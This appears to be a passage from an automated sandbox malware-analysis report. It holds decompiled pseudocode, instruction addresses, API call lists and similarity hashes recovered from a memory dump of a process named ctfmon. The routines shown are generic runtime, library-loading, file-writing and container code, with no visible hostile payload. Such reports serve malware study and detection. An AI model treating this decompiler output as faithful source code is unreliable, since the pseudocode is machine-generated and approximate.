						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x35554c30
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                0x00977ce3
                                                0x00977ce7
                                                0x00977cee
                                                0x00977cf2
                                                0x00977d00
                                                0x00977d16
                                                0x00977d1a
                                                0x00977d43
                                                0x00977d45
                                                0x00977d49
                                                0x00977d4c
                                                0x00977d4c
                                                0x00977d52
                                                0x00977d54
                                                0x00000000
                                                0x00977d55
                                                0x00977d1c
                                                0x00977d25
                                                0x00977d34
                                                0x00977d27
                                                0x00977d2a
                                                0x00977d30
                                                0x00977d30
                                                0x00977d38
                                                0x00000000
                                                0x00977d3a
                                                0x00977d3d
                                                0x00977d3f
                                                0x00000000
                                                0x00977d3f
                                                0x00977d38
                                                0x00977cf4
                                                0x00977cf9
                                                0x00000000

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00969C60,00000000,00000000,?,00977C85,00969C60,00000000,00000000,00000000,?,00977F44,00000006,FlsSetValue), ref: 00977D10
                                                • GetLastError.KERNEL32(?,00977C85,00969C60,00000000,00000000,00000000,?,00977F44,00000006,FlsSetValue,00986784,0098678C,00000000,00000364,?,009791CA), ref: 00977D1C
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00977C85,00969C60,00000000,00000000,00000000,?,00977F44,00000006,FlsSetValue,00986784,0098678C,00000000), ref: 00977D2A
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 9e4f7c648616cf339c63045a78980ed3b577921165c608f0e2b10e62068fba39
                                                • Instruction ID: 0a894f7502c652de9628b43e25bb2187d4d1170b22a2831029ca97d966309b13
                                                • Opcode Fuzzy Hash: 9e4f7c648616cf339c63045a78980ed3b577921165c608f0e2b10e62068fba39
                                                • Instruction Fuzzy Hash: C601D43761D622ABCB314AA8DC88A66B79CAF05BA57214A20ED09DB280D765DC0497E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00966440 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E00966440(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr* _v0;
				intOrPtr* _v12;
				void* __ebp;
				signed int _t21;
				intOrPtr* _t27;
				signed int _t30;
				signed int _t34;
				void* _t35;
				intOrPtr _t36;
				signed int _t38;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t47;
				void* _t51;

				_t46 = __esi;
				_t43 = __edi;
				_t40 = __edx;
				_t35 = __ebx;
				_t21 = _a4;
				if(_t21 != 0) {
					__eflags = _t21 - 0xffffffff;
					if(__eflags > 0) {
						E00971283(__eflags);
						goto L10;
					} else {
						__eflags = _t21 - 0x1000;
						if(__eflags < 0) {
							_t21 = E00970A6E(__esi, __eflags, _t21);
							_t51 = _t51 + 4;
							__eflags = _t21;
							if(__eflags != 0) {
								goto L1;
							} else {
								goto L12;
							}
						} else {
							_t2 = _t21 + 0x23; // 0x9661ff
							_t38 = _t2;
							__eflags = _t38 - _t21;
							if(__eflags <= 0) {
								L10:
								E00971283(__eflags);
								goto L11;
							} else {
								_t38 = E00970A6E(__esi, __eflags, _t38);
								_t51 = _t51 + 4;
								__eflags = _t38;
								if(__eflags == 0) {
									L11:
									E00975C20(_t35, _t38, _t40, _t43, __eflags);
									L12:
									E00975C20(_t35, _t38, _t40, _t43, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t38);
									_t41 =  *0x996a54;
									_push(_t46);
									_v12 = _t41;
									_t47 =  *((intOrPtr*)(_t41 + 4));
									__eflags =  *((char*)(_t47 + 0xd));
									if( *((char*)(_t47 + 0xd)) == 0) {
										_t27 = _v0;
										_push(_t35);
										_push(_t43);
										_t9 = _t27 + 0x10; // 0x458be85d
										_t36 =  *_t9;
										do {
											__eflags =  *((intOrPtr*)(_t27 + 0x14)) - 0x10;
											_t39 = _t47 + 0x10;
											if( *((intOrPtr*)(_t27 + 0x14)) < 0x10) {
												_t42 = _t27;
											} else {
												_t42 =  *_t27;
											}
											__eflags =  *((intOrPtr*)(_t39 + 0x14)) - 0x10;
											_t44 =  *((intOrPtr*)(_t39 + 0x10));
											if( *((intOrPtr*)(_t39 + 0x14)) >= 0x10) {
												_t39 =  *_t39;
											}
											__eflags = _t44 - _t36;
											_t29 =  <  ? _t44 : _t36;
											_t30 = E009651A0(_t39, _t42,  <  ? _t44 : _t36);
											_t51 = _t51 + 4;
											__eflags = _t30;
											if(__eflags != 0) {
												L23:
												if(__eflags < 0) {
													goto L25;
												} else {
													_t41 = _t47;
													_t47 =  *_t47;
													_v12 = _t41;
												}
											} else {
												__eflags = _t44 - _t36;
												if(_t44 < _t36) {
													L25:
													_t47 =  *((intOrPtr*)(_t47 + 8));
													_t41 = _v12;
												} else {
													__eflags = _t44 - _t36;
													__eflags = _t30 & 0xffffff00 | _t44 != _t36;
													goto L23;
												}
											}
											__eflags =  *((char*)(_t47 + 0xd));
											_t27 = _v0;
										} while ( *((char*)(_t47 + 0xd)) == 0);
									}
									return _t41;
								} else {
									_t3 = _t38 + 0x23; // 0x23
									_t34 = _t3 & 0xffffffe0;
									__eflags = _t34;
									 *(_t34 - 4) = _t38;
									return _t34;
								}
							}
						}
					}
				} else {
					L1:
					return _t21;
				}
			}






















                                                0x00966440
                                                0x00966440
                                                0x00966440
                                                0x00966440
                                                0x00966443
                                                0x00966448
                                                0x0096644e
                                                0x00966451
                                                0x0096648c
                                                0x00000000
                                                0x00966453
                                                0x00966453
                                                0x00966458
                                                0x0096647e
                                                0x00966483
                                                0x00966486
                                                0x00966488
                                                0x00000000
                                                0x0096648a
                                                0x00000000
                                                0x0096648a
                                                0x0096645a
                                                0x0096645a
                                                0x0096645a
                                                0x0096645d
                                                0x0096645f
                                                0x00966491
                                                0x00966491
                                                0x00000000
                                                0x00966461
                                                0x00966467
                                                0x00966469
                                                0x0096646c
                                                0x0096646e
                                                0x00966496
                                                0x00966496
                                                0x0096649b
                                                0x0096649b
                                                0x009664a0
                                                0x009664a1
                                                0x009664a2
                                                0x009664a3
                                                0x009664a4
                                                0x009664a5
                                                0x009664a6
                                                0x009664a7
                                                0x009664a8
                                                0x009664a9
                                                0x009664aa
                                                0x009664ab
                                                0x009664ac
                                                0x009664ad
                                                0x009664ae
                                                0x009664af
                                                0x009664b3
                                                0x009664b4
                                                0x009664ba
                                                0x009664bb
                                                0x009664be
                                                0x009664c1
                                                0x009664c5
                                                0x009664c7
                                                0x009664ca
                                                0x009664cb
                                                0x009664cc
                                                0x009664cc
                                                0x009664d0
                                                0x009664d0
                                                0x009664d4
                                                0x009664d7
                                                0x009664dd
                                                0x009664d9
                                                0x009664d9
                                                0x009664d9
                                                0x009664df
                                                0x009664e3
                                                0x009664e6
                                                0x009664e8
                                                0x009664e8
                                                0x009664ea
                                                0x009664ee
                                                0x009664f2
                                                0x009664f7
                                                0x009664fa
                                                0x009664fc
                                                0x00966509
                                                0x00966509
                                                0x00000000
                                                0x0096650b
                                                0x0096650b
                                                0x0096650d
                                                0x0096650f
                                                0x0096650f
                                                0x009664fe
                                                0x009664fe
                                                0x00966500
                                                0x00966514
                                                0x00966514
                                                0x00966517
                                                0x00966502
                                                0x00966502
                                                0x00966507
                                                0x00000000
                                                0x00966507
                                                0x00966500
                                                0x0096651a
                                                0x0096651e
                                                0x0096651e
                                                0x00966524
                                                0x0096652b
                                                0x00966470
                                                0x00966470
                                                0x00966473
                                                0x00966473
                                                0x00966476
                                                0x0096647a
                                                0x0096647a
                                                0x0096646e
                                                0x0096645f
                                                0x00966458
                                                0x0096644b
                                                0x0096644b
                                                0x0096644b
                                                0x0096644b

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e07a8dab52388ef84e1267da2bcfb90ce1d01131eeade51ba8bbd667723157b
                                                • Instruction ID: 882977065c8995f5907c72db9d98d5bb51457aba8f80dcef95a4509c928f22b5
                                                • Opcode Fuzzy Hash: 1e07a8dab52388ef84e1267da2bcfb90ce1d01131eeade51ba8bbd667723157b
                                                • Instruction Fuzzy Hash: A7F0277350030186AB28F7B58843B2E339C4EA0364B05873AF42DC71A2EE26E9908156
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00970F6C Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E00970F6C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t4;
				void* _t6;
				void* _t13;
				void* _t15;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t28;

				_t30 = __edi;
				_t29 = __edx;
				_t25 = __ecx;
				_t24 = __ebx;
				_push(__esi);
				E00976EAF(1);
				E0097730F(E0097173B());
				_t4 = E00977536();
				 *_t4 = E00971741();
				_t6 = E00970B8C(__edx, __edi, _t4, 1);
				_t37 = _t6;
				if(_t6 == 0) {
					L5:
					E00971477(_t29, _t30, 7);
					asm("int3");
					E00971777();
					__eflags = 0;
					return 0;
				} else {
					asm("fclex");
					E009717AC();
					E00970D30(_t37, E009717D7);
					_push(E00971737());
					_t13 = E00977237(_t25, __edx);
					_pop(_t27);
					if(_t13 != 0) {
						goto L5;
					} else {
						E00971744(_t13);
						_t15 = E00971794();
						_t39 = _t15;
						if(_t15 != 0) {
							_t15 = E00976F34(E00971741);
							_pop(_t27);
						}
						E00971802(E00971802(_t15));
						E00971750(_t29, _t30, _t39);
						E0097749F(_t27, _t29, E00971741());
						_pop(_t28);
						L00976986(_t24, _t28);
						E00971741();
						return 0;
					}
				}
			}











                                                0x00970f6c
                                                0x00970f6c
                                                0x00970f6c
                                                0x00970f6c
                                                0x00970f6c
                                                0x00970f6f
                                                0x00970f7a
                                                0x00970f7f
                                                0x00970f8d
                                                0x00970f8f
                                                0x00970f98
                                                0x00970f9a
                                                0x00970fff
                                                0x00971001
                                                0x00971006
                                                0x00971007
                                                0x0097100c
                                                0x0097100e
                                                0x00970f9c
                                                0x00970f9c
                                                0x00970f9e
                                                0x00970fa8
                                                0x00970fb2
                                                0x00970fb3
                                                0x00970fb9
                                                0x00970fbc
                                                0x00000000
                                                0x00970fbe
                                                0x00970fbe
                                                0x00970fc3
                                                0x00970fc8
                                                0x00970fca
                                                0x00970fd1
                                                0x00970fd6
                                                0x00970fd6
                                                0x00970fdc
                                                0x00970fe1
                                                0x00970fec
                                                0x00970ff1
                                                0x00970ff2
                                                0x00970ff7
                                                0x00970ffe
                                                0x00970ffe
                                                0x00970fbc

                                                APIs
                                                • ___scrt_initialize_onexit_tables.LIBCMT ref: 00970F8F
                                                • __RTC_Initialize.LIBCMT ref: 00970F9E
                                                  • Part of subcall function 00970D30: __onexit.LIBCMT ref: 00970D36
                                                  • Part of subcall function 00971744: InitializeSListHead.KERNEL32(00996158,00970FC3), ref: 00971749
                                                • ___scrt_fastfail.LIBCMT ref: 00971001
                                                • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 00971007
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
                                                • String ID:
                                                • API String ID: 3692885319-0
                                                • Opcode ID: ac0f0f69157a84438b62dd988d52b064c8047aafa3e42d4fa737887e0530a983
                                                • Instruction ID: 7fa61148db5aa3e4884227d21bad6601b53ecbf354e676175b773754da874b84
                                                • Opcode Fuzzy Hash: ac0f0f69157a84438b62dd988d52b064c8047aafa3e42d4fa737887e0530a983
                                                • Instruction Fuzzy Hash: 50F03A6355434293DA2C33FD5C4BBAE46890FC1765F24C814B99CAA0D3EE69D04450B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00964E00 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00964E00(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				int _t7;
				void* _t14;
				void* _t18;

				_push(__ecx);
				_t14 = __edx;
				_v8 = 0;
				_t18 = CreateFileA(__ecx, 0x40000000, 2, 0, 2, 0x80, 0);
				if(_t18 == 0) {
					L3:
					return 0;
				} else {
					_t7 = WriteFile(_t18, _t14, _a4,  &_v8, 0);
					_push(_t18);
					if(_t7 != 0) {
						CloseHandle();
						return 1;
					} else {
						CloseHandle();
						goto L3;
					}
				}
			}







                                                0x00964e03
                                                0x00964e19
                                                0x00964e1b
                                                0x00964e28
                                                0x00964e2c
                                                0x00964e4a
                                                0x00964e51
                                                0x00964e2e
                                                0x00964e39
                                                0x00964e3f
                                                0x00964e42
                                                0x00964e52
                                                0x00964e5f
                                                0x00964e44
                                                0x00964e44
                                                0x00000000
                                                0x00964e44
                                                0x00964e42

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,00969845), ref: 00964E22
                                                • WriteFile.KERNEL32(00000000,00000000,00969845,00000000,00000000,?,00969845), ref: 00964E39
                                                • CloseHandle.KERNEL32(00000000,?,00969845), ref: 00964E44
                                                • CloseHandle.KERNEL32(00000000,?,00969845), ref: 00964E52
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID:
                                                • API String ID: 3602564925-0
                                                • Opcode ID: 2aec7062cff2a72fec5c6748e44a37f4dbecf2dbda25b5d3a86a27037fb1dfd7
                                                • Instruction ID: 69aea3a37f6a14e32729effdd5523a08cc17c7508fc7953da91c6839a2ae585d
                                                • Opcode Fuzzy Hash: 2aec7062cff2a72fec5c6748e44a37f4dbecf2dbda25b5d3a86a27037fb1dfd7
                                                • Instruction Fuzzy Hash: 98F0E9326A9614B7D7204B85AC0FFEB7B5CEB45B21F014195FE08D6280D7A19C0557F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00966950 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E00966950(void* __ebx, void* __edx, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr* _a20) {
				intOrPtr* _v0;
				intOrPtr* _v4;
				intOrPtr _v20;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* __edi;
				void* __ebp;
				intOrPtr _t133;
				intOrPtr* _t135;
				intOrPtr _t136;
				intOrPtr* _t139;
				intOrPtr* _t140;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr* _t149;
				intOrPtr _t150;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr* _t163;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				intOrPtr _t179;
				intOrPtr* _t181;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t194;
				void* _t198;
				intOrPtr* _t199;
				intOrPtr _t200;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t209;
				void* _t210;
				intOrPtr* _t220;
				intOrPtr _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				char _t226;
				intOrPtr* _t228;
				intOrPtr* _t230;
				intOrPtr _t232;
				char* _t233;
				intOrPtr _t237;
				intOrPtr* _t239;
				char* _t241;
				intOrPtr* _t242;
				char _t243;
				void* _t249;
				signed int _t250;
				intOrPtr _t251;
				signed int _t264;

				_t198 = __ebx;
				_t133 =  *0x996a58;
				_t230 = _a20;
				if(_t133 < 0x5d1745c) {
					 *0x996a58 = _t133 + 1;
					_t135 = _a12;
					 *((intOrPtr*)(_t230 + 4)) = _t135;
					_t204 =  *0x996a54;
					__eflags = _t135 - _t204;
					if(_t135 != _t204) {
						__eflags = _a8;
						if(_a8 == 0) {
							 *((intOrPtr*)(_t135 + 8)) = _t230;
							_t205 =  *0x996a54;
							__eflags = _t135 -  *((intOrPtr*)(_t205 + 8));
							if(_t135 ==  *((intOrPtr*)(_t205 + 8))) {
								 *((intOrPtr*)(_t205 + 8)) = _t230;
							}
						} else {
							 *_t135 = _t230;
							_t208 =  *0x996a54;
							__eflags = _t135 -  *_t208;
							if(_t135 ==  *_t208) {
								 *_t208 = _t230;
							}
						}
					} else {
						 *((intOrPtr*)(_t204 + 4)) = _t230;
						 *((intOrPtr*)( *0x996a54)) = _t230;
						 *((intOrPtr*)( *0x996a54 + 8)) = _t230;
					}
					_t15 = _t230 + 4; // 0xc6088908
					_t136 =  *_t15;
					_t239 = _t230;
					__eflags =  *((char*)(_t136 + 0xc));
					if( *((char*)(_t136 + 0xc)) == 0) {
						do {
							_t17 = _t239 + 4; // 0xc6088908
							_t140 =  *_t17;
							_t223 =  *((intOrPtr*)(_t140 + 4));
							_t206 =  *_t223;
							__eflags = _t140 - _t206;
							if(_t140 != _t206) {
								__eflags =  *((char*)(_t206 + 0xc));
								if( *((char*)(_t206 + 0xc)) != 0) {
									__eflags = _t239 -  *_t140;
									if(_t239 ==  *_t140) {
										_t239 = _t140;
										E00966300(_t239);
									}
									_t51 = _t239 + 4; // 0xc6088908
									 *((char*)( *_t51 + 0xc)) = 1;
									_t53 = _t239 + 4; // 0xc6088908
									 *((char*)( *((intOrPtr*)( *_t53 + 4)) + 0xc)) = 0;
									_t56 = _t239 + 4; // 0xc6088908
									_t207 =  *((intOrPtr*)( *_t56 + 4));
									_t224 =  *((intOrPtr*)(_t207 + 8));
									 *((intOrPtr*)(_t207 + 8)) =  *_t224;
									_t146 =  *_t224;
									__eflags =  *((char*)(_t146 + 0xd));
									if( *((char*)(_t146 + 0xd)) == 0) {
										 *((intOrPtr*)(_t146 + 4)) = _t207;
									}
									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
									_t148 =  *0x996a54;
									__eflags = _t207 -  *((intOrPtr*)(_t148 + 4));
									if(_t207 !=  *((intOrPtr*)(_t148 + 4))) {
										_t149 =  *((intOrPtr*)(_t207 + 4));
										__eflags = _t207 -  *_t149;
										if(_t207 !=  *_t149) {
											 *((intOrPtr*)(_t149 + 8)) = _t224;
										} else {
											 *_t149 = _t224;
										}
									} else {
										 *((intOrPtr*)(_t148 + 4)) = _t224;
									}
									 *_t224 = _t207;
									goto L36;
								} else {
									goto L25;
								}
							} else {
								_t206 =  *((intOrPtr*)(_t223 + 8));
								__eflags =  *((char*)(_t206 + 0xc));
								if( *((char*)(_t206 + 0xc)) == 0) {
									L25:
									 *((char*)(_t140 + 0xc)) = 1;
									 *((char*)(_t206 + 0xc)) = 1;
									_t46 = _t239 + 4; // 0xc6088908
									 *((char*)( *((intOrPtr*)( *_t46 + 4)) + 0xc)) = 0;
									_t49 = _t239 + 4; // 0xc6088908
									_t239 =  *((intOrPtr*)( *_t49 + 4));
								} else {
									__eflags = _t239 -  *((intOrPtr*)(_t140 + 8));
									if(_t239 ==  *((intOrPtr*)(_t140 + 8))) {
										_t239 = _t140;
										E00966360(_t239);
									}
									 *((char*)( *((intOrPtr*)(_t239 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4)) + 0xc)) = 0;
									_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 4)) + 4));
									_t224 =  *_t207;
									 *_t207 =  *((intOrPtr*)(_t224 + 8));
									_t160 =  *((intOrPtr*)(_t224 + 8));
									__eflags =  *((char*)(_t160 + 0xd));
									if( *((char*)(_t160 + 0xd)) == 0) {
										 *((intOrPtr*)(_t160 + 4)) = _t207;
									}
									 *((intOrPtr*)(_t224 + 4)) =  *((intOrPtr*)(_t207 + 4));
									_t162 =  *0x996a54;
									__eflags = _t207 -  *((intOrPtr*)(_t162 + 4));
									if(_t207 !=  *((intOrPtr*)(_t162 + 4))) {
										_t163 =  *((intOrPtr*)(_t207 + 4));
										__eflags = _t207 -  *((intOrPtr*)(_t163 + 8));
										if(_t207 !=  *((intOrPtr*)(_t163 + 8))) {
											 *_t163 = _t224;
											 *((intOrPtr*)(_t224 + 8)) = _t207;
										} else {
											 *((intOrPtr*)(_t163 + 8)) = _t224;
											 *((intOrPtr*)(_t224 + 8)) = _t207;
										}
									} else {
										 *((intOrPtr*)(_t162 + 4)) = _t224;
										 *((intOrPtr*)(_t224 + 8)) = _t207;
									}
									L36:
									 *((intOrPtr*)(_t207 + 4)) = _t224;
								}
							}
							_t69 = _t239 + 4; // 0xc6088908
							_t150 =  *_t69;
							__eflags =  *((char*)(_t150 + 0xc));
						} while ( *((char*)(_t150 + 0xc)) == 0);
					}
					 *((char*)( *((intOrPtr*)( *0x996a54 + 4)) + 0xc)) = 1;
					_t139 = _a4;
					 *_t139 = _t230;
					return _t139;
				} else {
					_t2 = _t230 + 0x24; // 0x6afffffb
					_t167 =  *_t2;
					_t3 = _t230 + 0x10; // 0x966cb0
					_t241 = _t3;
					if( *_t2 >= 0x10) {
						E00965CF0(__ebx, __edx, _t230,  *_t241, _t167 + 1);
					}
					 *((intOrPtr*)(_t241 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t241 + 0x10)) = 0;
					if( *((intOrPtr*)(_t241 + 0x14)) >= 0x10) {
						_t241 =  *_t241;
					}
					 *_t241 = 0;
					L00970D45(_t230);
					_t250 = _t249 + 4;
					_push("map/set<T> too long");
					E009718DF();
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0xffffffff);
					_push(E00984610);
					_push( *[fs:0x0]);
					_t251 = _t250 - 0xc;
					_push(_t198);
					_push(_t241);
					_push(_t230);
					_t171 =  *0x98f008; // 0x35554c2f
					_push(_t171 ^ _t250);
					 *[fs:0x0] =  &_v32;
					_v36 = _t251;
					_v24 = 0;
					_t174 = 1;
					_t225 =  *0x996a54;
					_t209 = _t225;
					_t199 = _v4;
					_v40 = _t209;
					_v44 = 1;
					_t242 =  *((intOrPtr*)(_t225 + 4));
					if( *((char*)(_t242 + 0xd)) == 0) {
						do {
							_t83 = _t242 + 0x10; // 0x12
							_t228 = _t83;
							_t237 =  *((intOrPtr*)(_t228 + 0x10));
							_v28 = _t242;
							if( *((intOrPtr*)(_t242 + 0x24)) >= 0x10) {
								_t228 =  *_t228;
							}
							if( *((intOrPtr*)(_t199 + 0x14)) < 0x10) {
								_t220 = _t199;
							} else {
								_t220 =  *_t199;
							}
							_t193 =  <  ?  *((void*)(_t199 + 0x10)) : _t237;
							_t194 = E009651A0(_t220, _t228,  <  ?  *((void*)(_t199 + 0x10)) : _t237);
							_t251 = _t251 + 4;
							if(_t194 == 0) {
								_t221 =  *((intOrPtr*)(_t199 + 0x10));
								if(_t221 >= _t237) {
									__eflags = _t221 - _t237;
									_t91 = _t221 != _t237;
									__eflags = _t91;
									_t194 = 0 | _t91;
								} else {
									_t194 = _t194 | 0xffffffff;
								}
								_t264 = _t194;
							}
							_t174 = _t194 & 0xffffff00 | _t264 < 0x00000000;
							_v32 = _t174;
							if(_t174 == 0) {
								_t242 =  *((intOrPtr*)(_t242 + 8));
							} else {
								_t242 =  *_t242;
							}
						} while ( *((char*)(_t242 + 0xd)) == 0);
						_t209 = _v28;
						_t225 =  *0x996a54;
					}
					_t243 = _t209;
					_a8 = _t243;
					if(_t174 == 0) {
						L62:
						__eflags =  *((intOrPtr*)(_t199 + 0x14)) - 0x10;
						_t107 = _t243 + 0x10; // 0x11
						_t210 = _t107;
						_t226 =  *((intOrPtr*)(_t199 + 0x10));
						_a8 = _t226;
						if( *((intOrPtr*)(_t199 + 0x14)) >= 0x10) {
							_t199 =  *_t199;
						}
						__eflags =  *((intOrPtr*)(_t210 + 0x14)) - 0x10;
						_t232 =  *((intOrPtr*)(_t210 + 0x10));
						if( *((intOrPtr*)(_t210 + 0x14)) >= 0x10) {
							_t210 =  *_t210;
						}
						__eflags = _t232 - _t226;
						_t227 = _t199;
						_t176 =  <  ? _t232 : _t226;
						_t177 = E009651A0(_t210, _t199,  <  ? _t232 : _t226);
						__eflags = _t177;
						if(__eflags == 0) {
							_t210 = _a8;
							__eflags = _t232 - _t210;
							if(_t232 >= _t210) {
								__eflags = _t232 - _t210;
								_t114 = _t232 != _t210;
								__eflags = _t114;
								_t177 = 0 | _t114;
							} else {
								_t177 = _t177 | 0xffffffff;
							}
							__eflags = _t177;
						}
						if(__eflags == 0) {
							_t200 = _a12;
							_t179 =  *((intOrPtr*)(_t200 + 0x24));
							_t233 = _t200 + 0x10;
							__eflags = _t179 - 0x10;
							if(_t179 >= 0x10) {
								__eflags = _t179 + 1;
								E00965CF0(_t200, _t227, _t233,  *_t233, _t179 + 1);
							}
							 *((intOrPtr*)(_t233 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t233 + 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t233 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t233 + 0x14)) >= 0x10) {
								_t233 =  *_t233;
							}
							 *_t233 = 0;
							L00970D45(_t200);
							_t181 = _v0;
							 *_t181 = _t243;
							 *((char*)(_t181 + 4)) = 0;
							 *[fs:0x0] = _v20;
							return _t181;
						} else {
							_push(_a12);
							_t185 = E00966950(_t199, _t227,  &_a8, _v32, _v28, _t210);
							_t186 = _v0;
							 *_t186 =  *_t185;
							 *((char*)(_t186 + 4)) = 1;
							 *[fs:0x0] = _v20;
							return _t186;
						}
					} else {
						if(_t209 !=  *_t225) {
							E009668F0( &_a8);
							_t243 = _a8;
							goto L62;
						} else {
							_push(_a12);
							_t190 = E00966950(_t199, _t225,  &_a8, 1, _t209, _t209);
							_t191 = _v0;
							 *_t191 =  *_t190;
							 *((char*)(_t191 + 4)) = 1;
							 *[fs:0x0] = _v20;
							return _t191;
						}
					}
				}
			}

































































                                                0x00966950
                                                0x00966953
                                                0x0096695a
                                                0x00966962
                                                0x00966996
                                                0x0096699b
                                                0x0096699e
                                                0x009669a1
                                                0x009669a7
                                                0x009669a9
                                                0x009669bf
                                                0x009669c3
                                                0x009669d5
                                                0x009669d8
                                                0x009669de
                                                0x009669e1
                                                0x009669e3
                                                0x009669e3
                                                0x009669c5
                                                0x009669c5
                                                0x009669c7
                                                0x009669cd
                                                0x009669cf
                                                0x009669d1
                                                0x009669d1
                                                0x009669cf
                                                0x009669ab
                                                0x009669ab
                                                0x009669b3
                                                0x009669ba
                                                0x009669ba
                                                0x009669e6
                                                0x009669e6
                                                0x009669e9
                                                0x009669eb
                                                0x009669ef
                                                0x009669f5
                                                0x009669f5
                                                0x009669f5
                                                0x009669f8
                                                0x009669fb
                                                0x009669fd
                                                0x009669ff
                                                0x00966a79
                                                0x00966a7d
                                                0x00966a99
                                                0x00966a9b
                                                0x00966a9d
                                                0x00966aa0
                                                0x00966aa0
                                                0x00966aa5
                                                0x00966aa8
                                                0x00966aac
                                                0x00966ab2
                                                0x00966ab6
                                                0x00966ab9
                                                0x00966abc
                                                0x00966ac1
                                                0x00966ac4
                                                0x00966ac6
                                                0x00966aca
                                                0x00966acc
                                                0x00966acc
                                                0x00966ad2
                                                0x00966ad5
                                                0x00966ada
                                                0x00966add
                                                0x00966ae4
                                                0x00966ae7
                                                0x00966ae9
                                                0x00966aef
                                                0x00966aeb
                                                0x00966aeb
                                                0x00966aeb
                                                0x00966adf
                                                0x00966adf
                                                0x00966adf
                                                0x00966af2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00966a01
                                                0x00966a01
                                                0x00966a04
                                                0x00966a08
                                                0x00966a7f
                                                0x00966a7f
                                                0x00966a83
                                                0x00966a87
                                                0x00966a8d
                                                0x00966a91
                                                0x00966a94
                                                0x00966a0a
                                                0x00966a0a
                                                0x00966a0d
                                                0x00966a0f
                                                0x00966a12
                                                0x00966a12
                                                0x00966a1a
                                                0x00966a24
                                                0x00966a2b
                                                0x00966a2e
                                                0x00966a33
                                                0x00966a35
                                                0x00966a38
                                                0x00966a3c
                                                0x00966a3e
                                                0x00966a3e
